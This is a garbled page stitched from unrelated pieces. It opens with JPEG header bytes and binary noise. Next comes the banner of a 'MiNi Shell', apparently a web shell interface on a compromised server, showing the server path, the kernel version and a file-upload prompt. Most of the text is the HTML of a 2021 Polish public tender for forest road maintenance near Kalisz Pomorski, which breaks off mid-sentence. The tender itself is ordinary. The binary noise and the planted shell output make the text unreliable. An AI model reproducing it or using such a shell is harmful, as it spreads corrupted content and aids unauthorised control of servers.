JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211103/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211103/0025591802-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty budowlane - Nadleśnictwo Kalisz Pomorski </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Lasy Państwowe Zakład Usług Leśnych we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 930186230</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">P. Czajkowskiego 11/13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">51-171</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zulwroclaw@wroclaw.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zulwroclaw.wroclaw.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Budownictwo drogowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty budowlane - Nadleśnictwo Kalisz Pomorski </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b4b8c173-3ca5-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00255918</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy przetargowej https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html, a w przypadku wystąpienia awarii platformy uniemożliwiającej poprawną komunikację, za pośrednictwem poczty elektr., e-mail: <br/>zulwroclaw@wroclaw.lasy.gov.pl , z zastrzeżeniem, że złożenie oferty następuje <br/>wyłącznie przy użyciu platformy. <br/>2. Wymagania tech. i org. wysyłania i odbierania dokumentów <br/>elektr., elektr. kopii dokumentów i oświadczeń oraz informacji <br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie i instrukcjach korzystania z platformy, dostępnych na stronie <br/>https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html<br/>3. Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę) –<br/>zobowiązany jest zapoznać się z instrukcjami użytkowników Platformy - <br/>dostępnymi pod adresem https://zulwroclaw.logintrade.net/rejestracja/intstrukcje.html oraz zaakceptować regulamin korzystania z Platformy dostępny pod adresem: <br/>https://zulwroclaw.logintrade.net/rejestracja/regulamin.html .<br/>4. Za datę przekazania oferty przyjmuje się datę jej wysłania na platformę. Za <br/>datę przekazania wniosków, zawiadomień, dokumentów elektr., oświadczeń lub <br/>elektr. kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się <br/>datę ich wysłania na platformę, z zastrzeżeniem pkt 10.8. lit. b) SWZ.<br/>5. Ofertę oraz oświadczenia, o których mowa w art. 125 ust. 1 PZP, sporządza się, pod rygorem nieważności, w formie elektr. lub w postaci elektr. opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>6. Wykonawca składa ofertę za pośrednictwem platformy <br/>https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html . <br/>7. Do oferty należy dołączyć oświadczenia, o których mowa w art. 125 ust. 1 PZP, sporządzone, pod rygorem nieważności, w formie elektronicznej lub w postaci elektr. opatrzone podpisem zaufanym lub podpisem osobistym.<br/>8. Komunikacja pomiędzy Zamawiającym a Wykonawcami, w tym w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem platformy. <br/>9. Sposób sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektr. oraz środków komunikacji elektr. musi być <br/>zgodny z wymaganiami określonymi w rozporządzeniu Prezesa RM z 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania <br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz <br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia <br/>publicznego lub konkursie (Dz. U. 2020 poz. 2452).<br/>10. Dodatkowe informacje zawiera rozdział 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO opisana jest w rozdziale 21. SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna RODO opisana jest w rozdziale 21. SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TZ.270.26.2021.TPBN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 740796,54 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są roboty budowlane związane z konserwacją dróg leśnych na terenie Nadleśnictwa Kalisz Pomorski.<br/>2. Przedmiot zamówienia obejmuje:<br/>a) Równanie (profilowanie) dróg leśnych równiarką samojezdną wraz z zagęszczeniem walcem samojezdnym – 37400 m x 3,5 m = 130900 m2<br/>b) Załadunek materiału powierzonego przez inwestora w ilości szacunkowej około 1500 t, transport drogami leśnymi w miejsce wbudowania (teren Nadleśnictwa, max. odległość transportowa – 15 km) i rozsypanie przez przechył skrzyni - 98 kursów transportowych ( 1 kurs – 15 t.)<br/>c) Rozplantowanie rozłożonego materiału koparką lub ładowarką – 50 rg.<br/>d) Zagęszczeni rozłożonego materiału walcem samojezdnym – 40 rg.<br/>e) Ułożenie istniejącej nawierzchni po pracy recyklera (praca równiarki) – 30 rg.<br/>f) Zagęszczenie istniejącej nawierzchni po recyklingu (praca samojezdnego walca drogowego) – 30 rg.<br/>3. Roboty rozliczane będą powykonawczo w oparciu o ceny jednostkowe przedstawione w Ofercie i rzeczywiście wykonanych jednostkach obmiarowych. W związku z tym wynagrodzenie wykonawcy zmieni się proporcjonalnie do faktycznie wykonanych robót. <br/>4. Roboty budowlane będą realizowane w dniach od poniedziałku do piątku w godzinach 07:00 – 17:00, w terminie 21 dni od daty podpisania umowy.<br/>5. Zadanie zlokalizowane jest na terenach leśnych: województwo zachodniopomorskie, powiat drawski, gmina Kalisz Pomorski.<br/>6. Wykonawca jest odpowiedzialny za realizację przedmiotu zamówienia zgodnie z Ustawą z dnia 7 lipca 1994 roku Prawo Budowlane (tekst jedn.: Dz. U. z 2020 r., poz. 1333 z późn. zm.) oraz obowiązującymi normami.<br/>7. Wykonawca ponosi pełną odpowiedzialność za zapoznanie się z należytą starannością z rzeczywistym przedmiotem zamówienia oraz za uzyskanie wiarygodnej informacji odnośnie warunków i zobowiązań, które w jakikolwiek sposób mogą wpłynąć na wartość oferty lub realizację robót. Wykonawca ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia i stanu miejsca wykonania przedmiotu zamówienia.<br/>8. Wykonawca ma obowiązek zapoznać się z dokumentacją przetargową (SWZ wraz z załącznikami) i wszelkie wątpliwości wyjaśnić na etapie trwania postępowania o udzielenie zamówienia i przygotowywania oferty.<br/>9. Dodatkowe informacje zawiera rozdział 3. SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233141-9 - Roboty w zakresie konserwacji dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do przedmiotu zamówienia Zamawiający jest uprawniony zlecić <br/>Wykonawcy dodatkowy zakres rzeczowy obejmujący roboty budowlane takie same (analogiczne), jak opisane w opisie przedmiotu zamówienia („Opcja”). Przedmiotem Opcji będą roboty budowlane analogiczne, jak opisane w SWZ (i wycenione przez Wykonawcę w Ofercie). Zamawiający nie jest zobowiązany do zlecenia robót objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich uruchomienie. Roboty budowlane będące przedmiotem Opcji mogą zostać uruchomione w ilości stanowiącej równowartość do 20 % wartości przedmiotu zamówienia określonej zgodnie z § 8 ust 1 wzoru umowy stanowiącego załącznik nr 3 do SWZ. Podstawą określenia wartości robót uruchomionych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych pozycji Oferty.<br/>Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: (1) wystąpienia potrzeby zwiększenia zakresu rzeczowego robót stanowiących przedmiot zamówienia na skutek zaistnienia okoliczności uniemożliwiających kontynuacje i/lub zakończenie robót, (2) wystąpienia konieczności wprowadzenia zmian w technologii realizowanego zadania. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7) PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego. <br/>2. Zamówienia, o których mowa w pkt 1. będą polegały na powtórzeniu robót zgodnych z robotami stanowiącymi przedmiot niniejszego zamówienia oraz robót podobnych do nich w aspekcie technologicznym ich wykonawstwa. Zakresem rzeczowym robót stanowiących przedmiot zamówień, o których mowa w pkt 1. objęte będą roboty wskazane rodzajowo w pkt 3.1.SWZ<br/>3. Zakres rzeczowy robót stanowiących przedmiot zamówień, o których mowa w pkt 1. nie przekroczy wartości 100 % wartości niniejszego zamówienia.<br/>4. Zamówienia, o których mowa w pkt 1. będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki. <br/>5. Zamówienia, o których mowa w pkt 1. będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót betonowych, murarskich, instalacyjnych oraz rozbiórkowo – porządkowych, stanowiących przedmiot zamówienia na skutek konieczności ich wykonania w celu osiągnięcia zamierzonego efektu końcowego.Zamawiający przewiduje możliwość udzielenia zamówień o których mowa w pkt 1. w przypadku: (1) wystąpienia potrzeby zwiększenia zakresu rzeczowego robót stanowiących przedmiot zamówienia na skutek zaistnienia okoliczności uniemożliwiających kontynuacje i/lub zakończenie robót, (2) wystąpienia konieczności wprowadzenia zmian w technologii realizowanego zadania.<br/>6. Zamówienia, o których mowa w pkt 1. zostały przewidziane w ogłoszeniu o <br/>zamówieniu, a ich wartość została uwzględniona przy ustalaniu wartości zamówienia.<br/>7. Miejscem realizacji zamówień, o których mowa w pkt 1. będzie województwo <br/>zachodniopomorskie, powiat drawski, gmina Kalisz Pomorski.<br/>8. Pozostałe warunki realizacji zamówienia zawarto we wzorze umowy stanowiącej <br/>załącznik nr 3 do SWZ.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/>Cn<br/>C = ------------ x 100 pkt x 60 %<br/>Co <br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena brutto spośród ofert ocenianych,<br/>Co – cena brutto oferty ocenianej <br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu Oferty (Załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór <br/>prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z <br/>przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium „Skrócenie terminu realizacji” oceniane będzie Skrócenie terminu realizacji w stosunku do terminu realizacji wynikającego z SWZ (tj. 21 dni od dnia podpisania umowy). Do oceny w ramach kryterium zostanie przyjęta liczba pełnych dni skracających termin realizacji zawarty w formularzu Oferty (załącznik nr 1 do SWZ). Wykonawca może skrócić termin realizacji o 7 dni. Jeżeli Wykonawca zaoferuje skrócenie terminu realizacji o liczbę dni równą zero, Zamawiający przyjmie, iż zaoferowany został maksymalny termin realizacji 21 dni i przyzna Wykonawcy w niniejszym kryterium 0 punktów. <br/>Oferta z zaoferowaną największą liczbą dni skracającą termin realizacji (tj. <br/>maksymalnie o 7 dni) otrzyma najwyższą ilość punktów w tym kryterium oceny ofert (tj. 40 pkt). <br/>W przypadku zaoferowania liczby dni skracający maksymalny termin realizacji <br/>więcej niż 7 dni, do oceny w ramach tego kryterium przyjęte zostanie 7 oraz <br/>maksymalna ilość punktów (tj. 40 pkt.). Natomiast do umowy zostanie wprowadzony skrócony termin realizacji wynikający z Oferty. <br/>Jeżeli Wykonawca nie wskaże w formularzu Oferty (załącznik nr 1 do SWZ) liczby dni skracających termin realizacji, Zamawiający przyjmie, iż zaoferowany został maksymalny termin realizacji w ilości 21 dni i przyzna Wykonawcy w niniejszym kryterium 0 punktów.<br/>Pozostali Wykonawcy, tj. Wykonawcy, którzy zaoferują liczbę dni skracających <br/>termin realizacji pomiędzy maksymalnie o 7 dni, a minimalnie o 1 dzień otrzymają liczbę punktów obliczoną wg wzoru:<br/>To<br/>T = --------------------------------- x 100 pkt x 40%<br/>Tn (7 dni ) <br/>gdzie: <br/>T – liczba punktów w ramach kryterium „Skrócenie terminu realizacji”,<br/>To – liczba dni skracająca maksymalny termin realizacji w ofercie ocenianej <br/>Tn – najwyższa liczba dni skracająca maksymalny termin realizacji przewidziana <br/>przez Zamawiającego (o 7 dni) <br/>Maksymalna ilość punktów za skrócenie terminu realizacji – 40 pkt<br/>3) Całkowita liczba punktów, jaką otrzyma dane oferta, zostanie obliczona wg <br/>poniższego wzoru: L = C + T <br/>gdzie: <br/>L – całkowita liczba punktów, <br/>C – punkty uzyskane w kryterium „Cena ofertowa brutto”, <br/> T – liczba punktów w ramach kryterium „Skrócenie terminu realizacji”, <br/>Za najkorzystniejszą ofertę uznana zostanie Oferta wykonawcy, która uzyska największą liczbę punktów w/w kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu mogą brać udział Wyk., którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym -Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gosp. lub zaw., o ile wynika to z odrębnych przepisów -Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w odniesieniu do warunku dot. sytuacji ekonomicznej. Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową nie mniejszą niż 50 000,00 zł.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat od dnia w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej 2 roboty budowlane (przez robotę budowlaną rozumie się wykonanie prac budowlanych na podstawie 1 umowy) polegające na wykonaniu remontu, budowy lub przebudowy obiektów budowlanych inżynierii lądowej i wodnej, na kwotę nie mniejszą niż 100 000,00 zł brutto każda.<br/>b) Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w odniesieniu do warunku dot. potencjału technicznego.<br/>c) Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą na stanowisko:<br/>- kierownik budowy: Posiadającą uprawnienia budowlane do kierowania <br/>robotami budowlanymi w specjalności konstrukcyno – budowlanej bez ograniczeń, wydane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2020 r., poz. 1333 ze zm., dalej – „Prawo budowlane”) lub odpowiadające im ważne uprawnienia budowlane, które <br/>zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn. Dz. U. z 2020 r., <br/>poz. 220 z późn. zm.), które uprawniają do pełnienia samodzielnych funkcji technicznych w budownictwie przy realizacji przedmiotu zamówienia, biorąc pod uwagę jego zakres.<br/>2. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 9 SWZ.<br/>3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 7.1. SWZ powinni spełniać łącznie wszyscy Wykonawcy.<br/>W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>4. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub 